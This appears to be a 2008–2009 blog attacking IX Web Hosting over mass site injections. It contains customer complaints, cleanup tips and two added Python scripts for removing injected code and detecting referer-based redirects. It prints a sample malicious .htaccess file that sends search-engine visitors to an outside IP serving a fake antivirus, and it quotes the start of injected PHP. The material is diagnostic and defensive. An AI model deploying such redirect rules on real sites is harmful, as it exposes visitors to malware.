IX Web Hosting Warning

Unreliable, Insecure, Incompetent Web Hosting

EASY Access to IX Web Hosting's Server ROOT

From an Unhappy IX customer

I was beginning to think I was crazy. My site would get hacked and I would change the password. This would keep happening over and over. Yet every time I would call in they would say it was my fault. Well today I discovered that once again my site had been hacked as well as all the other domains in my userid for them. While going through one of my sub domains I found a hacker's control panel which I downloaded and took a screen shot. I even looked around in it. I realized quite quickly that I had server root access and I could see other people's files like I was on a regular computer. This control panel seems to have it all. Anyway here is a screen shot for all you who wonder what is going on:

I have marked my info out to spare me as well as the folder I was browsing. But this control panel seems to have any exploits you want on it with very little effort.  It even has a handy self kill button which I used. Of course I am sure they will be back and hack right back in. Meanwhile I have to look into another host.

[Image: IXhackerscreen6, the screenshot of the control panel]

May 26, 2009 Posted by neverixweb | IX Web Hosting | 2 Comments

Tip from a reader “How to clean the Yahoo Counter Injection Script”

Hey buddy,
nice website, I wish I had seen it before I renewed my contract with the crooks at IX for 2 more years…
Well, I am writing because I couldn't find on your website a solution to clean the infections automatically, so maybe you want to post a solution:

here is what I did:

1 – Download the entire site
2 – Open an infected file with Adobe Dreamweaver
3 – Look for the infected code, select all of it and copy it to the clipboard (starts with "<?php if(!function_exists('tmp_lkojfghx'))…"). You must copy ALL the code!
4 – Still in Dreamweaver, click on EDIT>FIND AND REPLACE
5 – In the FIND box, paste the infected code
6 – In the FIND IN dropdown, select FOLDER and point it to the folder where your website was downloaded.
7 – Click on REPLACE ALL (Dreamweaver will replace the code with whatever is in the REPLACE box; as we didn't write anything there, it will clean the code)

I found out that all the infected files on my sites had exactly the same code, so it was quite fast to remove them.

 

Ivan

Thanks Ivan for your feedback, I hope this helps others, also sorry to hear your sites are still constantly being injected. It's clear that IX Web Hosting still has not got a clue how to solve this issue, and on top of this they are having 3 other major issues to deal with.
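
Ivan's find-and-replace procedure as a script, added here as an example that is not part of the reader's tip or of this blog's own material. The page quotes only the start of the injected code, so BLOCK below is a constructed placeholder (paste the full block copied from one of your own infected files); the function names are this example's own.

```python
import os
import shutil
import tempfile

# Function name quoted in the reader's tip; used to spot copies of the
# injection that differ from the exact block and would survive the replace.
MARKER = b"tmp_lkojfghx"

# Constructed placeholder: only the opening of the real block is on the page.
BLOCK = b"<?php if(!function_exists('tmp_lkojfghx')){ /* constructed placeholder body */ } ?>"


def clean_tree(root, injected_block, backup_suffix=".infected.bak"):
    """Remove every exact copy of injected_block from the files under root.

    Returns (cleaned, leftovers): cleaned maps each changed file to the number
    of copies removed; leftovers lists files that still contain MARKER after
    cleaning, i.e. variants that an exact-match replace cannot catch.
    """
    cleaned, leftovers = {}, []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.endswith(backup_suffix):
                continue  # never rewrite our own backups on a second run
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            count = data.count(injected_block)
            if count:
                shutil.copy2(path, path + backup_suffix)  # keep the evidence
                data = data.replace(injected_block, b"")
                with open(path, "wb") as fh:
                    fh.write(data)
                cleaned[path] = count
            if MARKER in data:
                leftovers.append(path)
    return cleaned, sorted(leftovers)


def demo():
    """Run clean_tree over a constructed site tree; return relative results."""
    with tempfile.TemporaryDirectory() as root:
        os.mkdir(os.path.join(root, "sub"))
        variant = BLOCK.replace(b"){ ", b") { ")  # same code, different spacing
        samples = {
            "index.php": BLOCK + b"<?php echo 'home'; ?>\n",
            "footer.html": b"<p>footer</p>\n" + BLOCK + b"\n" + BLOCK,
            "about.html": b"<p>about</p>\n",
            os.path.join("sub", "variant.php"): variant + b"<?php echo 1; ?>\n",
        }
        for rel, body in samples.items():
            with open(os.path.join(root, rel), "wb") as fh:
                fh.write(body)
        cleaned, leftovers = clean_tree(root, BLOCK)
        with open(os.path.join(root, "index.php"), "rb") as fh:
            index_after = fh.read()
        backup_kept = os.path.exists(os.path.join(root, "index.php.infected.bak"))
        rel_cleaned = {os.path.relpath(p, root): n for p, n in cleaned.items()}
        rel_left = [os.path.relpath(p, root) for p in leftovers]
        return rel_cleaned, rel_left, index_after, backup_kept


if __name__ == "__main__":
    cleaned, leftovers, _index, _backup = demo()
    for path, n in sorted(cleaned.items()):
        print(f"cleaned {path}: removed {n} copy/copies")
    for path in leftovers:
        print(f"REVIEW {path}: marker still present, block differs from the exact copy")
```

Files reported for review are the case Ivan did not hit: his sites all carried exactly the same code, and an exact-match replace silently skips anything that differs by even one character.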

February 13, 2009 Posted by neverixweb | IX Web Hosting | 6 Comments

IX Web Hosting Reviews Jan. 2009

George, 30th January, 2009
If you are planning to run a serious website, DO NOT use Ix web hosting, they are more trouble than they are worth. Virus, Slow, Database problems, and Email issues.  
 
Paolo, 23rd January, 2009
After reading the reviews about the servers / databases slowing down at a certain time, I checked my log files, and it's true, like clockwork at 2 am every night they come to a standstill until 7.30 am then they pick up again. I posted a support ticket, after almost 24 hours I finally got a response telling me the ticket has been forwarded to support!!!!!… What is the point of that??.
I am looking into moving my sites to HostGator. 
 
Gary, 22nd January, 2009
I am so sick and tired of ix web hosting!
I have had nothing but problems with them. Their support is useless, rude and they lie.
For the truth visit
http://ixwebhostwarning.wordpress.com/
 
Marky, 22nd January, 2009
Hacked, Injected, De-Faced, Slow, Useless Support and lots more.
IX is 100% USELESS!!
 
jack, 21st January, 2009
The server of ixwebhosting is down now. It has been on and off and stalling for the past month.. they keep saying it was fixed but it isn't. It's very upsetting. We have had to complain and make complaints every day three times…. anyone know of a better hosting for Windows?
 
Melanov, 21st January, 2009
haha, i know how ixwebhosting is being attacked, I know who is behind the injecting. Over a year ago we contacted ix explaining they had problems, we had a very rude reply telling us it was lies, and the servers were secure. We added a folder with a fake website to at least 200 websites. Now ix wanted to listen, and even offered to pay per security issue.. but now it is too late.
ixwebhosting should listen when help is offered.
 
Gerald W, 21st January, 2009
I am in the process of moving my 12 sites from ix, I never had a problem with them for over 3 years, but as of November it has been one injection after the other. IX is not willing to help customers, instead they just want their money, and point the finger at customer once EVERY site on the servers are injected.
Don’t waste your time or money on these people.
 
Michael, 18th January, 2009
I completely agree with Blake, every night at midnight ALL my sites on two business accounts come to a screeching halt, every night I call ix, and they apologize, and tell me they will find the cause and firewall the site, or even suspend the site(s) causing the slowdown, but this has been going on for weeks.
Also, I use “Mailwasher” that connects to my mailserver every 10 minutes, and every morning when I check mailwasher, I get an error log telling me that it could not connect to the server, with at least 20 times that it could not connect to the server.
It’s time to drop ix web hosting
AVOID
 
Blake, 17th January, 2009
I am totally and completely disgusted with IX Webhosting. It used to be a great host and I recommended it to everyone I could. But something has changed. I believe they got sold. Since then, we have had nothing but endless trouble with this host…

Last year, they proudly moved to a new Data Center. Of course this caused us problems for several months. They kept apologizing, but the problems persisted. After a very long period, things calmed down and remained that way until November…

Without prior warning, IX moved our site to a new server in November. After 60+ hours of calling, using Live Chat, and using the ticket support system, they finally worked out most problems. I felt like I had to beg to get IX to help resolve the problems that they created. I lost an entire weekend fighting them. The IX response times average between 12-24 hours…

Then again this January, IX updated all of our cgi-bin files in our domain and all of our sub-domains recreating the problems that were caused in November’s unnecessary server move. Again, it took over 60+ hours to get our site up and running. I had to find workarounds to get our site up and running, and amazingly, IX tried to take credit for getting our site up and running again even though they had nothing to do with it…

Even though our site is up and running now, we still have many problems. After 176 hours of fighting IX for help, they have yet to correct the Cron job errors that still plague our site…

The last two days, the server has crashed in the evening requiring another call to IX to get the server restarted/reset and our site back online. This was the same pattern that plagued us after the Data Center move last year. And early every morning, the page load response times drag down to a crawl. This seems to start between midnight and 4 AM every single night. The other day, the slowness continued well into the following day. We get an apology from IX each time this happens, but they don’t seem to be doing anything to permanently correct it…

IX has tried very hard to blame these problems on our code, which worked fine before the server move in November and again up until January. IX does not want to take responsibility for their actions and it is frustrating and disgusting dealing with them. I cannot in good conscience recommend IX Webhosting to anyone until they improve the skills of their own Technical Support staff. It wouldn’t hurt if they hired a few more knowledgeable people to improve their response times too. Waiting 12-24 hours for each new response to a ticket is totally unacceptable. With IX’s lack of effort, a resolution to a problem can drag on for days and weeks. IX does the bare minimum to assist its clients and they do it as slow as they possibly can…

Dealing with IX technical support gets real old real fast. I wouldn’t wish this on anyone…
 
 
Hans, 17th January, 2009
Do not believe their “Money Back Guarantee” After 3 weeks I requested a refund, and I only got about 30% of the full sum, they even charged me $20 for a .com, $20!!!, I can get these for $4.95.
Stay Away from these idiots
 
ett, 11th January, 2009
If IX is no 3 in the Top 10 companies list, what is the service level provided by those below on the list? Must be pretty terrible, eh?!
I have experience from IX as well as other hosts. Of the ones I’ve used, IX is the worst, one.com (in Denmark!!) has given me the best value for money.
 
Mike, 10th January, 2009
Bloody USELESS!
 
Muluut, 10th January, 2009
I am now just 3 months hosting with ix hosting and every day I having big problems. these people do not help and all my sites are hacked. I ask for backup and they tell me backups are no good, backups are hacked same as websites
ix hosting is no good for hosting.
 
Laurie, 10th January, 2009
With them for about 2-4 years. Was OK, nice customer service but inefficient now that I am having BIG problems – and now has been a nightmare since January 1st 2009. Now all my six websites are not even loading. Not even an error message! "server taking too long to respond" My site was hacked apparently (never happened in 10 years) and since then problems everyday. Even google has put a warning to visitors about malware from my site. My Google results have dropped completely. Now have been offline for 24 hours. Disaster. Will change. I was told they are having problems with one of their servers. I don't care. I'm changing. Will pay more for more.
 
Jonathan, 09th January, 2009
I too have been with IX for just under 4 years, and I too have pure html sites, I have 7 websites, I have always been very happy with IX, and up until September 2008 I had never had any issues. But since September my sites have been hacked, changed and re-directed on a weekly basis. IX keeps telling me about folder permissions and Ftp viruses, but I do not run any scripts, and do not have any folders, so I know that cannot be the cause. I will be moving all my sites to another host. 
 
Archer Rejn, 09th January, 2009
I have been with IX for already 4 years and have never had any problems. May be cause I do not use any free php applications like wp or Joomla ? All my sites are html files with some Java scripts. I have never been hacked and all my sites load pretty fast. 
 
Magix, 09th January, 2009
Don’t waste your time or money on these people. 100% USELESS! 
 
kjett, 09th January, 2009
There is at least one positive aspect of using IX, viz. you learn a lot about the perils of using a web host without sufficient technical knowledge and/or security routines.
You learn that you yourself have to take responsibility for implementation of all the precautions needed, such as recurrently (frequently) making sure your hosted domains haven’t been hacked, having all directories properly chmod-ed and .htaccess-ed, and keeping updated backups on a local server.
These security routines will prove to be useful when you move to a hopefully more competent and secure web host.
 
beyaz, 06th January, 2009
have the same problem!!!! they are just after money instead of clearing their s**t!
 
George W Bush, 05th January, 2009
Don’t waste your time with these people, they are just a bunch of incompetent retards.
 
Sammy J, 05th January, 2009
4 days ago my 6 sites were injected with code, I spent 2 full days cleaning my sites, ix wanted to charge me $80 an hour to clean them, today all 6 sites are injected yet again.. I'm moving to another host, People, beware of IX they do not give a damn about your sites, all they want is your money.
 
Anita, 03rd January, 2009
Add me to the list of customers that have been affected by ix's .htaccess vulnerability, and yes they are blaming me, the best part is, they are willing to fix this for me for $80 !!
 
Roger no Kids, 02nd January, 2009
@ Roger Kids..
You TWAT!!..
People don't like IX because they HAVE tried them!!.. If you haven't tried them, how is a person supposed to know if they like them or not?..
All a person can expect, is what they are promised and what they pay for.. NO MATTER what the price is.
IX are RIP OFF'S they promise, take your money and accuse you for their incompetence.
 
Roger Kids, 01st January, 2009
Cmon` guys. If you don`t like IX why you choose it? Try to spin around for hosting which is better and cheaper. Let`s see what u`ll get

February 2, 2009 Posted by neverixweb | IX Web Hosting | 1 Comment

IX Web Hosting’s PHP Upgrade Notification

Dear Nicole **********,

We are happy to inform you that over the next two weeks we will upgrade PHP to the latest 4.x version (4.4.9) on the web server your website is currently being hosted on. This upgrade will resolve many security exploits and make services more stable.

As part of this upgrade, we will migrate from an Apache Module to a CGI based installation that gives you more control over many PHP settings. Once implemented, you will have the ability to upload your very own php.ini file into your cgi-bin folder as needed.

After the upgrade, your website may experience a few errors, all of which can be quickly resolved. Most are caused by having PHP directives inside an .htaccess file.

To fix this problem, simply login to your control panel and click on the WebShell icon. The .htaccess file will not be viewable unless you have “show hidden files” checked in your WebShell settings. Open the .htaccess file and remove any lines that start with “php_”. If you need to retain these settings, then they must now go into a php.ini file and placed into your cgi-bin folder.

If you are running PHP in any of your HTM/HTML files, please add this line to your .htaccess file:
AddHandler php-script .php .php3 .php4 .htm .html .phtml

If you have any questions or concerns about this upgrade, please do not hesitate to contact us 24/7 via live chat, ticket, or phone support and we will be glad to assist.

I hope you will enjoy the new features and increased security!

Best Regards,

Fatima Said, CCO
IX Web Hosting

January 29, 2009 Posted by neverixweb | IX Web Hosting | 1 Comment

IX Web Hosting still blames 777 permissions

Hundreds of unhappy IX Web Hosting Customers are contacting me, telling me they are still being blamed for the Yahoo Counter Script Injection and the .htaccess hack.

IX is blaming "Folder Permissions", saying 777 should not be used, and in the case that NO FOLDERS are being used, they turn to the "Ftp Virus". BOTH of these are complete rubbish and LIES, and if you corner an IX Web Host manager with some facts and a bit of knowledge they will admit that it IS an issue on the "IX Servers".

I have been PERSONALLY told by THREE MANAGERS.. Kenny, Drew and Lauren that IX is aware that they have security issues, and each time they assure me that the problem will be fixed soon, that was 9 months ago!!
The problem has not been solved, and is nowhere near being solved, actually it is getting worse.
Almost 10 months ago the problem was that the iFrame Yahoo Counter was injected into every file; today the problems are numerous: 3 different injections and a .htaccess hack!! on both the php4 and php5 platform.

So, why is IX Web Hosting admitting they have issues to certain people, and LYING to others? The reason for this is that the Support Monkeys have been told to NEVER admit that IX has issues; if the monkeys admitted to every customer that it was due to IX's security issues that more than 120.000 sites were being infected on a weekly basis, all hell would break loose and somewhere along the line someone would sue.
So, as of yet for as far as I know it is only certain managers that are admitting to certain people, that IX is to blame.   

IX Web Hosting blames 777 folder Permission!!!… Do me a favor!!, it’s 2009, HUNDREDS OF MILLIONS of people are using Open Source CMS (content management system ) such as WordPress, Joomla, Drupal etc..etc..
Many of these scripts will not work without 777 permission ( images, templates etc)

If in 2009 IX Web Hosting cannot host a CMS site  without it getting injected or defaced, then they are NOT FIT to host websites and should pack their bags and leave town … for good!!

Why is it, that IX has a page on their website that explains in detail how to install and use WordPress and Joomla, but they still blame customers for using these CMS scripts.

Next time you speak to an IX  Support  Monkey ask them how the following  is possible

  1. 5 html sites ( 100% html) not running any scripts or folders get injected?
  2. How is it possible to MASS overwrite 644 files (.htaccess)
  3. How is it possible to MASS add .htaccess files
  4. Why is it, that if I did have an Ftp Virus, they only inject 2 business accounts, when they would have access to all 4?.. Why don't they inject all 4?
  5. Why is it only IX Web Hosting and Host Excellence ( owned by ix web hosting) are having these problems? if it was a 777 folder permission issue 100's of Millions would be affected, and EVERY webhost in the  world would have the same problems.
  6. ANY Server Side injection of 1000's of sites is surely the responsibility of IX, and NOT a Folder Permission issue.. I have access to all my folders, but there is no way that I can access someone else's site.
    It’s clear that this issue is server root related.

One more thing, a 777 folder used by the likes of WordPress or Joomla ARE SAFE!!..  Does IX Web Hosting really believe that they can carry on blaming customers? MORE THAN  ONE THIRD of ALL IX Web Hosting sites are infected!!… More than 120.000 sites infected !!

January 23, 2009 Posted by neverixweb | IX Web Hosting | 3 Comments

IX Web Hosting making money from their INSECURE SERVERS

For going on 10 months now ix web hosting’s servers have been under attack, both the older php4 and the new php5 are full of security issues, and have been seeded and are constantly injected with various scripts and / or the .htaccess file gets renamed and customer sites are re-directed.

MORE than 120.000 IX hosted sites are injected / .htaccess hacked on a weekly basis, an excellent opportunity for the scum IX to make a quick buck!!

IX Web Hosting will clear up the mess that is caused by their extreme Incompetence and INSECURE SERVERS for just $80 AN HOUR!!

A few days ago I was contacted by an IX customer that hosted 5 html sites ( not a single script)  all 5 websites were injected with the Yahoo Counter Script, this was the 3rd time in one month that this had happened, each time she just  re-uploaded all her sites, but still her sites got injected. The 4th time she approached IX to help her get her sites back in order. IX charged her $160 ( 2 hours) to get her sites back to normal. 6 DAYS later all her sites were injected, but luckily the bastards at IX were willing to help her again for another $80 an hour.

January 20, 2009 Posted by neverixweb | Uncategorized | 8 Comments

Is YOUR site INFECTED by the Yahoo Counter or .htaccess

A lot of people are contacting me, asking HOW you would know if your site is infected.
Let me start by saying that in some cases you will know immediately when something is wrong, but in other cases it might not be too clear.

The YAHOO COUNTER SCRIPT

[Image: footinject1]

The Yahoo Counter script is an iFrame JavaScript injection that injects code into the Footer, Body, or Header, or all three at once.
Thousands of IX Web Hosting customers are infected with this code, and they do not even know it! The web page looks normal, but this can be very dangerous: your website will eventually drop from ALL the major search engines, and your domain will be flagged as "Dangerous Malware" by all the search engines.
To check if you have the Yahoo Counter injected, go to any search engine and visit your site from there. The sign of the injection is that your site loads as it should, BUT it still shows "Loading" in the taskbar for some time, and then in most cases ( but not always) an "Acrobat Reader" error message will pop up.

[Image: adob]

Now you must check the "Source Code" ( Menu Bar –> View –> Source ) and you will notice the code that has been injected.

 

The .htaccess Injection

This is a very sneaky injection, because most people who have websites and check them open them either from a shortcut or directly by entering the URL. In both these cases your website will look perfectly normal, BUT anyone trying to access your website through any of the major search engines will be re-directed.

[Images: fakeav, fakeav2, fakeav1]

Once that is done, a FAKE ANTI VIRUS will pop up, and start scanning your PC, it will then alert you that you have dangerous files on your PC, and if they should be removed, if you click YES, you are screwed!!, a Trojan with KeyLogger will be executed on your PC, and you are INFECTED!!…

Anyone who has the FAKE ANTI VIRUS pop up, should just click off the site NEVER click “Yes” or “No”.. just click OFF the page , if your PC freezes, use “Ctrl-Alt-Delete” and Stop the process… then out of precaution you can “Delete” your cached internet files.

An example of the injected .htaccess file.

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*oogle.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ahoo.*$ [NC]
RewriteRule .* h**p://87.248.180.89/topic.html?s=s [R,L] ( link altered by ME )
 

Remember, you only get re-directed if you click on your url from a search engine
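
A way to check a downloaded copy of a site for the referer-conditional redirect shown above, as an added example that is not part of the original post. Both sample files and the redirect.example.invalid host are constructed, the function names are this example's own, and referer_triggers assumes the conditions form an [NC] OR chain as in the injected file.

```python
import os
import re
import sys
from urllib.parse import urlparse

# Constructed sample modelled on the injected file above (placeholder host).
INJECTED = r"""RewriteEngine On
RewriteCond %{HTTP_REFERER} .*oogle.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ahoo.*$ [NC]
RewriteRule .* http://redirect.example.invalid/topic.html?s=s [R,L]
"""

# Constructed sample of legitimate rules (canonical host, hotlink protection)
# that also mention HTTP_REFERER or redirect, and must not be flagged.
LEGIT = r"""RewriteEngine On
RewriteCond %{HTTP_HOST} ^example\.com$ [NC]
RewriteRule ^(.*)$ http://www.example.com/$1 [R=301,L]
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://(www\.)?example\.com/ [NC]
RewriteRule \.(gif|jpe?g|png)$ - [F]
"""


def find_referer_redirects(text, own_hosts=()):
    """Flag each RewriteRule that sends visitors whose Referer matches a
    (non-negated) condition to an absolute URL on a host outside own_hosts."""
    own = {h.lower() for h in own_hosts}
    findings, conds = [], []
    for lineno, raw in enumerate(text.splitlines(), 1):
        parts = raw.strip().split()
        if not parts or parts[0].startswith("#"):
            continue
        directive = parts[0].lower()  # Apache directive names are case-insensitive
        if directive == "rewritecond" and len(parts) >= 3:
            conds.append((parts[1], parts[2]))
        elif directive == "rewriterule" and len(parts) >= 3:
            referer_pats = [pat for test, pat in conds
                            if "http_referer" in test.lower()
                            and not pat.startswith("!")]
            try:
                target = urlparse(parts[2])
                host = (target.hostname or "").lower()
            except ValueError:
                target, host = None, ""
            if (referer_pats and target is not None
                    and target.scheme in ("http", "https") and host not in own):
                findings.append({"line": lineno, "host": host,
                                 "referer_patterns": referer_pats})
            conds = []  # conditions apply only to the RewriteRule that follows
    return findings


def referer_triggers(finding, referer):
    """True if a visit carrying this Referer header would be redirected."""
    return any(re.search(pat, referer, re.IGNORECASE)
               for pat in finding["referer_patterns"])


if __name__ == "__main__":
    # Usage: script.py <downloaded-site-folder> [own-host ...]
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for dirpath, _dirs, files in os.walk(root):
        if ".htaccess" in files:
            path = os.path.join(dirpath, ".htaccess")
            with open(path, encoding="utf-8", errors="replace") as fh:
                for hit in find_referer_redirects(fh.read(), sys.argv[2:]):
                    print(f"{path}:{hit['line']}: visitors with a matching "
                          f"Referer are redirected to {hit['host']}")
```

An empty Referer, which is what the owner sends when typing the URL or using a bookmark, does not trigger the rule, which is why the site looks normal to its owner.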

January 11, 2009 Posted by neverixweb | IX Web Hosting | 2 Comments

IX Web Hostings Servers using both Php4 and Php5 INFECTED


As I wrote yesterday, MORE THAN ONE THIRD OF ALL IX Web Hosting’s hosted sites are INFECTED.
And to make things worse, the problem is spreading.
Up until Jan. 3rd 2009 it was only the older servers still running Php4 that were being affected, but now even the NEW server blocks, running Php5 are being injected.
IX Customers with sites on the server block with mysql address mysql501.ixwebhosting.com that runs php5. are being injected.

This is bad enough, and the fact that after 9 MONTHS!!! IX Web Hosting has still NOT GOT A CLUE how this is being done is a complete DISGRACE!!
And to add salt to the wounds, IX is not just being attacked with one form of iFrame injection, NO, IX is being attacked THREE different ways.
1) The notorious ” YAHOO COUNTER” is being injected into the FOOTER of every file.
2) The .htaccess file that is overwriting and / or adding an .htaccess file into the root of every site and re-directing sites
3) As of Jan. 3rd 2009, a SECOND but modified version of the ” YAHOO COUNTER ” iFrame injection is now being injected into BOTH the Header, AND / OR Body of every file.

Today an IX Web Hosting customer sent me a link to their site, that was injected with THREE Yahoo Counters, Header, Body and Footer.
The owner of the site told me that the site would take ages to load, and would often even timeout, and Google had dropped the site completely from the Search Engine, penalized because of the “Malware Script”

Here is a quote from IX Support’s Alex Karamushko :

We have currently problem with Yahoo counter hack, but our system administrators and security analysts working hard for finding exact reason of that problem and we can assure you that this will be fixed shortly.

After 9 months, I ask myself what ” shortly” actually means?!.. Another week?, month?, or maybe 3 months?.. because I was told by “AGENT IX” that at the rate things are going now, by May 2009 EVERY website hosted at IX will be infected by these injections.

January 11, 2009 Posted by neverixweb | IX Web Hosting | 13 Comments

IX Web Hosted sites Hacked & Defaced Jan 9th 2009

January 9, 2009 Posted by neverixweb | IX Web Hosting | No Comments Yet

A NEW wave of iFrame Injections for IX Web Hosts Customers

It has come to my attention that a NEW wave of iFrame injections has infected 1000’s of new IX Web Host Customers, unlike the previous injection, that injected javascript into the footer of every file, this new piece of code is being injected into the “Header” of every file..

The new code looks like this:


 

Manager Kenny at IX Web Hosting  informed a customer today ( Mon 5th Jan.) that  they were testing right now and should be completed in a week or two…

ONE OR TWO WEEKS!!!.. Hey we have been waiting for 8 MONTHS!!!!  You would think that by the advice IX is giving all their paying customers, and blaming them for everything, and then offering to fix the problem for $80 AN HOUR!!.. that they would know how to fix this problem, but it is clear they do not, and instead of putting more time and effort into solving this, what does IX do??… TRY AND MAKE MONEY FROM THE PROBLEM!!!… That's correct, IX Web Hosting is offering to fix / clean customer sites for $80 an hour!!…  This is an absolute disgrace!!

To me it is clear that a large group of people know the vulnerability at IX servers, and various people are now injecting their own script, that's why we are starting to see various different scripts appearing.

January 5, 2009 Posted by neverixweb | IX Web Hosting | 1 Comment

IX Web Hosted Sites Hacked and Defaced Jan. 2nd 2009

January 2, 2009 Posted by neverixweb | IX Web Hosting | 2 Comments

IX web hosted sites Hacked and Defaced December 29th

December 29, 2008 Posted by neverixweb | IX Web Hosting | No Comments Yet

IX Web Hosting and the Yahoo Counter Script Injection

I started this blog just 2 weeks ago, and today I received my 1000th Email asking me about the code that is injected into the footer of every file hosted on seeded IX Web Hosting Servers.

Hundreds of  IX customers, are contacting me to ask about the Injected script ( posted in a previous post) they are asking me HOW to remove it, because they cannot find it…

The Reason they cannot find it??

Because of a MASSIVE SECURITY ISSUE on IX WEB HOSTING's SERVERS!!.. the script is NOT actually put onto any of your pages, the script is actually hidden somewhere on the server..

So far I have found 5 “seeds” .. These are the codes that are appearing  in  over 100,000 sites

Remember to view the “source code” in the above links.

Very interesting is the second “seed” that is actually in an IX standard “modlogan” folder, that is standard a chmod 700 .

Secondly it should not be possible on any shared server to inject this script onto EVERY file on that server. The fact that this is happening means that IX web Hosting has not got a clue how to protect their servers, and customer web sites. 

So as you can see, this script IS NOT actually put into your script, that is why you cannot find it.. HOWEVER, somewhere on your site, there is a bit of code "Calling" this script, and that appears in your pages.
Check  ALL the pages that get called for every page, ie. header, footer, index, sidebar etc. 

So far I have evidence and proven that the following IX servers running the following Database’s  are seeded:

  • mysql33.ixwebhosting.com
  • mysql15.ixwebhosting.com
  • mysql27.ixwebhosting.com

If you know of any others that are seeded, please let me know.

Hope this helps

:: Some people have contacted me to tell me that the Injected Script is ( also ) injected into the database, and in some cases a new table is created.
I have checked 9 databases of infected sites, and I have not yet come across the script in my Database’s, so I think that this might be “script” related, maybe that some scripts such as PhpBB2 allows for this to happen, so I recommend searching your Database for the script as well ::

December 24, 2008 Posted by neverixweb | IX Web Hosting | 11 Comments

IX and Hacked and Defaced Dec 24 2008

December 24, 2008 Posted by neverixweb | IX Web Hosting, Uncategorized | 2 Comments

Links discussing IX Web hosting Service

Here is a list of sites that other people are posting about IX web hosting

Links will be posted on the fly..


December 10, 2008 Posted by neverixweb | IX Web Hosting | 1 Comment